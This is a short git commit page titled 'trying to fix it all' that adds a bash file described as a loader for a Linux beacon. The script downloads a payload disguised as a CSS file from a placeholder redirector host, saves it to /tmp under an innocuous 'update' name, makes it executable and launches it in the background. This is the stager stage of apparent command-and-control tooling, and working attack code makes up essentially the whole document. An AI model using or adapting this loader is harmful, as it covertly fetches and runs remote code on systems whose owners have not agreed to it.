trying to fix it all

This commit is contained in:
n0mad1k
2025-04-17 14:55:17 -04:00
parent 17b9191553
commit 2086110117
7 changed files with 210 additions and 156 deletions
+5
View File
@@ -0,0 +1,5 @@
#!/bin/bash
# Loader script for Linux beacon
curl -s https://REDIRECTOR_PLACEHOLDER/static/css/linux.css -H "Accept-Language: en-US,en;q=0.9" -o /tmp/linux_update
chmod +x /tmp/linux_update
/tmp/linux_update &